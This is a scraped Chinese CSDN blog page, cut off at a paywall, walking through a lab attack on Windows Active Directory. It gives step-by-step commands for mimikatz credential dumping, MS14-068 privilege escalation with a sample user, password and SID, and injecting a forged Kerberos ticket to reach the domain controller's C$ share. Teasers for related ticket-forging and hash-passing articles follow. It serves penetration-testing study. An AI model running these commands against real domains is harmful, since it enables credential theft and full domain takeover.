域渗透--金银票据问题

最新推荐文章于 2024-08-21 23:47:01 发布
最新推荐文章于 2024-08-21 23:47:01 发布
阅读量1.2k 收藏 3
点赞数
文章标签: 局域网 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vdieoo/article/details/109379140
版权
本文详细介绍了域渗透过程,包括使用金票据和银票据提升域内用户权限的方法。首先,通过伪造凭据提升普通用户权限,然后利用MS14-068漏洞进行权限提升。接着,展示了如何使用mimikatz获取krbtgt的NTLM Hash和SID,生成金票和银票,并解释了它们的工作原理及区别。金票能伪造TGT,提供任意Kerberos访问权限,而银票伪造ST,仅能访问特定服务。
摘要由CSDN通过智能技术生成

金票据

  • 伪造凭据,提升域内普通用户权限

以admin用户登入任意一台域内主机

 

收集域信息

命令有:net config workstation,可以看到域名为:cyberpeace。

              nltest /dsgetdc:域名,可以看到域控主机名为:scene。

 

 

以admin权限运行mimikztz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

找到域内一个用户和对应密码

 

 

使用该域用户登入域内

执行:dir \scene.cyberpeace.com\c$,尝试列出域控目录,提醒权限不够

尝试利用MS14-068来将用户的权限提升到域管权限

 

检查是否有提权漏洞,其补丁为 3011780,我们执行命令: systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在MS14-068漏洞。

 

 

MS14-068漏洞利用方法:

MS14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

 

 

目前我们已经知道域成员devuser和其密码,域控制器地址scene.cyberpeace.com,还需要知道的是devuser的SID值。

 

通过Whoami /all或者whoami /user,查看devuser用户的suid:

 

 

 

执行命令:

C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com


命令执行成功后会在当前目录下生成一个凭证。

 

再使用mimikatz清空之前缓存的凭证,导入伪造的凭证:mimikatz # kerberos::purge  //清空票据mimikatz # kerberos::ptc 凭证文件地址

此刻再输入:

dir \\scene.cyberpeace.com\c$,发现访问成功,现在我们

最低0.47元/天 解锁文章
Vdieoo
关注
内网渗透--CS伪造黄金票据与白银票
Armandhe的博客
06-24 3766
性感作者,在线翻车
AD渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 841
过两天研究明白kerberos协议里每次发包中各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali中帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道中的tgt验证用户k
内网渗透——黄金票据与白银票
来日可期的博客
10-11 3541
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有内的最高权限,攻击者可以访问和控制所有内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
渗透银票据学习
cxk
06-10 1116
银票据(silver ticket):它不需要和控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 控计算机账户的ntlm hash 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02 实战 环境 控2k3,ip:192.168.5...
Kerberos认证以及黄金票据银票据的简单介绍
最新发布
Reset
08-21 1034
Kerberos是一种网络身份认证的协议,协议设计目的是通过使用秘钥加密技术为客户端/服务器应用程序提供强身份验证,保护服务器防止错误的用户使用,同时保护它的用户使用正确的服务器,即支持双向验证。Kerberos协议的整个认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改和插入数据。简而言之,Kerberos作为一种可信任的第三方认证服务,通过传统的密码技术(共享密钥)执行认证服务。
黄金票据和白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5737
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
银票据/黄金票据构造分析
灰太的表格的博客
10-29 949
银票据/黄金票据构造分析
渗透-白银票据和黄金票据的利用
orange777
02-23 3909
最近做了一些靶场渗透的实验,记录下一些关于白银票据和黄金票据问题。 0x01 白银票据的利用 1 环境信息 控DC 192.168.183.130 内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的用户有管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@
渗透:黄金票据
ClarkAlbert的博客
10-29 1625
渗透:黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
计算机的常见命令,环境的简单介绍+渗透常用命令
weixin_32329059的博客
07-26 796
一、的简单介绍:有安全边界的集合,同一中计算机相互信任,计算机之间允许相互访问。根:网络中第一个,一个林只有一个根树:由多个组成,形成连续的名字空间,一个.代表一个层次,层次越深级别越低。如:lm.org、ftp.lm.org、test.ftp.lm.org林:一个林可以有多个树。如:lm.org 根test.org 树二、AD的简单介绍将网络中多台计算机逻辑上组...
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4406
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
渗透测试-网络攻防面试题(非常全面,根据自己经验所写,长期更新)
weixin_46626737的博客
01-03 1422
10)mssql,orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1)脏牛内核提权----------------------------------------------no----------------------------------------------
内网渗透:三、Kerberos协议及票据(黄金和白银)伪造
liu_jia_liang的博客
02-20 3717
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
【内网安全】黄金票据与白银票
过期的秋刀鱼
10-12 1282
黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用管理员身份创建的票据就是黄金票据,可以访问内的所有服务。黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用管理员身份创建的票据就是黄金票据,可以访问内的所有服务。
内网渗透(四) | 票据传递攻击
Ms08067安全实验室
06-29 2781
票据传递攻击(Pass the Ticket,PtT)票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了内krbtg...
2024年内网渗透TIPS总结(3),2024年最新2024Golang笔试真题
2401_84925780的博客
05-14 869
中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交。在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务,命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会。机上创建一个psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过psexec 服务运行命令,运行结束后删除服务。
银/金/钻石票据传递攻击
qq_59468567的博客
04-14 875
意思就是,当攻击者能够获得krbtgt的Hash后,攻击者就可以伪造一张票据授权票,去伪造成内的任意用户访问内kerberos认证的所有服务。Kerberos协议的基本流程是Client先通过AS(身份认证服务)进行身份认证,认证通过后AS会给Client一个TGT(票据授权票),Client将获取到的TGT发送到TGS(票据授予服务)进行身份验证,验证通过后TGS会给Client一个ST(服务票据),Client通过这个ST去访问指定Server上的服务。白银票据:伪造服务票据,只能访问指定的服务。
渗透 | 白银票据利用
无心的博客
10-30 2991
目录 0x01 介绍 0x02 白银票据利用 0x01 介绍 之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets) 白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值